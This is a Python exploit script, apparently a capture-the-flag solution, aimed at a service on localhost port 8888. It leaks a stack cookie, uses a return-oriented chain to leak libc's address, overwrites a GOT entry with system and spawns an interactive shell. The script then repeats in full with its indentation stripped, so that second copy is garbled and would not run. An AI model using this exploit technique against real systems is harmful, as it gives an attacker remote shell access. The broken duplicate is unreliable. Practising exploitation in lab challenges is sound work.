otms61/angry.py

## angry.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket, struct, re, telnetlib

def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f

def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

def p(a):
    return struct.pack("<I",a)

def u(a):
    return struct.unpack("<I",a)[0]

def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

def get_cookie():
    s, f = sock('localhost', 8888)
    s.recv(100)
    s.send('4  \n')
    s.send('yyyyyyyyyy\n')
    read_until(f, 'yyyyyyyyyy\n')
    return u('\x00' + s.recv(3))
cookie = get_cookie()
print "[*] cookie: {}".format(hex(cookie))

read_plt = 0x8048620
write_plt = 0x80486e0
read_got = 0x804b010
binsh = 0x804970d

pop3ret = 0x8048b2c

libc_read_offset = 0xdb4f0
libc_system_offset = 0x40190

s, f = sock('localhost', 8888)
read_until(f, 'Give up\n')

s.send('4  \n')
read_until(f, 'sure? (y/n) ')

payload = ''
payload += 'y'*10
payload += p(cookie)
payload += 'a'*12
payload += p(write_plt)
payload += p(pop3ret)
payload += p(0)
payload += p(read_got)
payload += p(4)
payload += p(read_plt)
payload += p(pop3ret)
payload += p(0)
payload += p(read_got)
payload += p(4)
payload += p(read_plt)
payload += p(0xdeadbeaf)
payload += p(binsh)
s.send(payload+'\n')

libc_read = u(s.recv(4))
libc_base = libc_read - libc_read_offset
libc_system = libc_base + libc_system_offset
print "[*] libc system: {}".format(hex(libc_system))
s.send(p(libc_system)+'\n')
print "Got a Shell!"
shell(s)
	#!/usr/bin/python
	# -- coding: utf-8 --
	import socket, struct, re, telnetlib

	def sock(remoteip, remoteport):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((remoteip, remoteport))
	f = s.makefile('rw', bufsize=0)
	return s, f

	def read_until(f, delim='\n'):
	data = ''
	while not data.endswith(delim):
	data += f.read(1)
	return data

	def p(a):
	return struct.pack("<I",a)

	def u(a):
	return struct.unpack("<I",a)[0]

	def shell(s):
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()

	def get_cookie():
	s, f = sock('localhost', 8888)
	s.recv(100)
	s.send('4 \n')
	s.send('yyyyyyyyyy\n')
	read_until(f, 'yyyyyyyyyy\n')
	return u('\x00' + s.recv(3))
	cookie = get_cookie()
	print "[*] cookie: {}".format(hex(cookie))

	read_plt = 0x8048620
	write_plt = 0x80486e0
	read_got = 0x804b010
	binsh = 0x804970d

	pop3ret = 0x8048b2c

	libc_read_offset = 0xdb4f0
	libc_system_offset = 0x40190

	s, f = sock('localhost', 8888)
	read_until(f, 'Give up\n')

	s.send('4 \n')
	read_until(f, 'sure? (y/n) ')

	payload = ''
	payload += 'y'*10
	payload += p(cookie)
	payload += 'a'*12
	payload += p(write_plt)
	payload += p(pop3ret)
	payload += p(0)
	payload += p(read_got)
	payload += p(4)
	payload += p(read_plt)
	payload += p(pop3ret)
	payload += p(0)
	payload += p(read_got)
	payload += p(4)
	payload += p(read_plt)
	payload += p(0xdeadbeaf)
	payload += p(binsh)
	s.send(payload+'\n')

	libc_read = u(s.recv(4))
	libc_base = libc_read - libc_read_offset
	libc_system = libc_base + libc_system_offset
	print "[*] libc system: {}".format(hex(libc_system))
	s.send(p(libc_system)+'\n')
	print "Got a Shell!"
	shell(s)